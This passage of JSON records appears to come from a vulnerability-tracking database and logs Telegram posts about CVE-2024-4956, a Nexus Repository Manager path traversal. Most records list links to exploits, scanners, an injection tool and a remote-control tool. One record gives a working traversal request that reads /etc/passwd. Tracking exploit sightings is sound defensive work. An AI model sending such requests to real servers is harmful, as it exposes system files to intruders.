behavior of packed malicious .NET samples. \n\nhttps://github.com/imperva/frida-jit-unpacker\n\nExploits for CNEXT (CVE-2024-2961), a buffer overflow in the glibc's iconv() \n\nhttps://github.com/ambionics/cnext-exploits?tab=readme-ov-file\n\n\u53bb\u4e2d\u5fc3\u5316\u8fdc\u7a0b\u63a7\u5236\u5de5\u5177\uff08Decentralized Remote Administration Tool\uff09\uff0c\u901a\u8fc7ENS\u5b9e\u73b0\u4e86\u914d\u7f6e\u6587\u4ef6\u5206\u53d1\u7684\u53bb\u4e2d\u5fc3\u5316\uff0c\u901a\u8fc7Telegram\u5b9e\u73b0\u4e86\u670d\u52a1\u7aef\u7684\u53bb\u4e2d\u5fc3\u5316 \n\nhttps://github.com/SpenserCai/DRat\n\nAbusing Windows fork API and OneDrive.exe process to inject the malicious shellcode without allocating new RWX memory region. \n\nhttps://github.com/Offensive-Panda/RWX_MEMEORY_HUNT_AND_INJECTION_DV\n\nCollection of references to write-ups, blog posts and papers related to cybersecurity, reverse engineering and exploitation (constantly updated)\n\nhttps://github.com/0xor0ne/awesome-list/blob/main/topics/cybersec.md\n\nGitHub - yoryio/CVE-2024-20767: Exploit for CVE-2024-20767 - Adobe ColdFusion\n\nhttps://github.com/yoryio/CVE-2024-20767\n\nGitHub - TracecatHQ/tracecat: \ud83d\ude3c The open source alternative to Tines / Splunk SOAR. Build AI-assisted workflows, orchestrate alerts, and close cases fast.\n\nhttps://github.com/TracecatHQ/tracecat\n\nGitHub - sarperavci/CloudflareBypassForScraping: A cloudflare verification bypass script for webscraping\n\nhttps://github.com/sarperavci/CloudflareBypassForScraping\n\n#HackersFactory", "creation_timestamp": "2024-05-28T10:20:28.000000Z"}, {"uuid": "7f9558b2-a87a-4cff-b4a9-929b96516c2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "published-proof-of-concept", "source": "https://t.me/GhostsForum/21615", "content": "Tools - Hackers Factory\n\nAn incredibly fast proxy checker &amp; IP rotator with ease. \n\nhttps://github.com/kitabisa/mubeng\n\n[CVE-2024-4956] Nexus Repository Manager 3 Unauthenticated Path Traversal Bulk Scanner \n\nhttps://github.com/ifconfig-me/CVE-2024-4956-Bulk-Scanner/\n\nRepository to house markdown templates for researchers \n\nhttps://github.com/bugcrowd/templates\n\nPython for AWAE (Advanced Web Attacks and Exploitation) \n\nhttps://github.com/shreyaschavhan/python-for-awae\n\nA tool for collecting RDP, web and VNC screenshots all in one place \n\nhttps://github.com/nccgroup/scrying\n\nJeeves SQLI Finder \n\nhttps://github.com/ferreiraklet/Jeeves\n\nThe Frida-Jit-unPacker aims at helping researchers and analysts understand the behavior of packed malicious .NET samples. \n\nhttps://github.com/imperva/frida-jit-unpacker\n\nExploits for CNEXT (CVE-2024-2961), a buffer overflow in the glibc's iconv() \n\nhttps://github.com/ambionics/cnext-exploits?tab=readme-ov-file\n\n\u53bb\u4e2d\u5fc3\u5316\u8fdc\u7a0b\u63a7\u5236\u5de5\u5177\uff08Decentralized Remote Administration Tool\uff09\uff0c\u901a\u8fc7ENS\u5b9e\u73b0\u4e86\u914d\u7f6e\u6587\u4ef6\u5206\u53d1\u7684\u53bb\u4e2d\u5fc3\u5316\uff0c\u901a\u8fc7Telegram\u5b9e\u73b0\u4e86\u670d\u52a1\u7aef\u7684\u53bb\u4e2d\u5fc3\u5316 \n\nhttps://github.com/SpenserCai/DRat\n\nAbusing Windows fork API and OneDrive.exe process to inject the malicious shellcode without allocating new RWX memory region. \n\nhttps://github.com/Offensive-Panda/RWX_MEMEORY_HUNT_AND_INJECTION_DV\n\nCollection of references to write-ups, blog posts and papers related to cybersecurity, reverse engineering and exploitation (constantly updated)\n\nhttps://github.com/0xor0ne/awesome-list/blob/main/topics/cybersec.md\n\nGitHub - yoryio/CVE-2024-20767: Exploit for CVE-2024-20767 - Adobe ColdFusion\n\nhttps://github.com/yoryio/CVE-2024-20767\n\nGitHub - TracecatHQ/tracecat: \ud83d\ude3c The open source alternative to Tines / Splunk SOAR. Build AI-assisted workflows, orchestrate alerts, and close cases fast.\n\nhttps://github.com/TracecatHQ/tracecat\n\nGitHub - sarperavci/CloudflareBypassForScraping: A cloudflare verification bypass script for webscraping\n\nhttps://github.com/sarperavci/CloudflareBypassForScraping\n\n#HackersFactory", "creation_timestamp": "2024-05-28T10:27:55.000000Z"}, {"uuid": "4de3e423-5116-482f-8574-652696fc9e8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2541", "content": "https://github.com/vulhub/vulhub/tree/master/nexus/CVE-2024-4956\n\nNexus Repository Manager 3 Unauthenticated Path Traversal (CVE-2024-4956)\n#github #poc", "creation_timestamp": "2024-05-25T18:57:58.000000Z"}, {"uuid": "cb93f5d6-40f2-4061-bb41-0826bc540e06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/6610", "content": "Tools - Hackers Factory\n\nAn incredibly fast proxy checker &amp; IP rotator with ease. \n\nhttps://github.com/kitabisa/mubeng\n\n[CVE-2024-4956] Nexus Repository Manager 3 Unauthenticated Path Traversal Bulk Scanner \n\nhttps://github.com/ifconfig-me/CVE-2024-4956-Bulk-Scanner/\n\nRepository to house markdown templates for researchers \n\nhttps://github.com/bugcrowd/templates\n\nPython for AWAE (Advanced Web Attacks and Exploitation) \n\nhttps://github.com/shreyaschavhan/python-for-awae\n\nA tool for collecting RDP, web and VNC screenshots all in one place \n\nhttps://github.com/nccgroup/scrying\n\nJeeves SQLI Finder \n\nhttps://github.com/ferreiraklet/Jeeves\n\nThe Frida-Jit-unPacker aims at helping researchers and analysts understand the behavior of packed malicious .NET samples. \n\nhttps://github.com/imperva/frida-jit-unpacker\n\nExploits for CNEXT (CVE-2024-2961), a buffer overflow in the glibc's iconv() \n\nhttps://github.com/ambionics/cnext-exploits?tab=readme-ov-file\n\n\u53bb\u4e2d\u5fc3\u5316\u8fdc\u7a0b\u63a7\u5236\u5de5\u5177\uff08Decentralized Remote Administration Tool\uff09\uff0c\u901a\u8fc7ENS\u5b9e\u73b0\u4e86\u914d\u7f6e\u6587\u4ef6\u5206\u53d1\u7684\u53bb\u4e2d\u5fc3\u5316\uff0c\u901a\u8fc7Telegram\u5b9e\u73b0\u4e86\u670d\u52a1\u7aef\u7684\u53bb\u4e2d\u5fc3\u5316 \n\nhttps://github.com/SpenserCai/DRat\n\nAbusing Windows fork API and OneDrive.exe process to inject the malicious shellcode without allocating new RWX memory region. \n\nhttps://github.com/Offensive-Panda/RWX_MEMEORY_HUNT_AND_INJECTION_DV\n\nCollection of references to write-ups, blog posts and papers related to cybersecurity, reverse engineering and exploitation (constantly updated)\n\nhttps://github.com/0xor0ne/awesome-list/blob/main/topics/cybersec.md\n\nGitHub - yoryio/CVE-2024-20767: Exploit for CVE-2024-20767 - Adobe ColdFusion\n\nhttps://github.com/yoryio/CVE-2024-20767\n\nGitHub - TracecatHQ/tracecat: \ud83d\ude3c The open source alternative to Tines / Splunk SOAR. Build AI-assisted workflows, orchestrate alerts, and close cases fast.\n\nhttps://github.com/TracecatHQ/tracecat\n\nGitHub - sarperavci/CloudflareBypassForScraping: A cloudflare verification bypass script for webscraping\n\nhttps://github.com/sarperavci/CloudflareBypassForScraping\n\n#HackersFactory", "creation_timestamp": "2024-05-28T10:20:28.000000Z"}, {"uuid": "adc99460-ba3a-4584-9b4b-df7cb9363a62", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "published-proof-of-concept", "source": "https://t.me/codeb0ss/1440", "content": "", "creation_timestamp": "2024-05-24T00:59:26.000000Z"}, {"uuid": "a1bc2a39-c075-446f-8506-679a9f03650c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "published-proof-of-concept", "source": "https://t.me/thebugbountyhunter/8818", "content": "POC\u200a\u2014\u200aCVE-2024\u20134956 -Unauthenticated Path Traversal\n\nhttps://medium.com/@verylazytech/poc-cve-2024-4956-unauthenticated-path-traversal-f24b1a595e0e", "creation_timestamp": "2024-06-13T18:36:11.000000Z"}, {"uuid": "0b0c0dc5-986d-4dd5-9a09-668ed5d0aaca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2533", "content": "cve-2024-4956\n\nGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1\n\n#poc  #exploit", "creation_timestamp": "2024-05-23T11:27:11.000000Z"}, {"uuid": "a4547463-23f6-46ec-a55a-1eddc4260092", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/10615", "content": "#Fuzzing\n1. JettyFuzz - harness for fuzzing Nexus Repository 3 Path Traversal Vulnerability (CVE-2024-4956)\nhttps://github.com/X1r0z/JettyFuzz\n2. Application of Fuzzing in Java Vulnerability Discovery\nhttps://evilpan.com/2023/09/09/java-fuzzing", "creation_timestamp": "2024-06-03T18:02:10.000000Z"}, {"uuid": "d7e2fedb-ab23-4385-adde-4eb94c981ac8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/10562", "content": "#exploit\n1. CVE-2024-29269:\nTelesquare TLR-2005KSH Unauth RCE\nhttps://github.com/Chocapikk/CVE-2024-29269\n]-&gt; https://github.com/wutalent/CVE-2024-29269/blob/main/index.md\n\n2. CVE-2024-4956:\nNexus Repo Manager 3 Unauth Path Traversal\nhttps://github.com/vulhub/vulhub/tree/master/nexus/CVE-2024-4956", "creation_timestamp": "2024-05-25T13:07:26.000000Z"}]}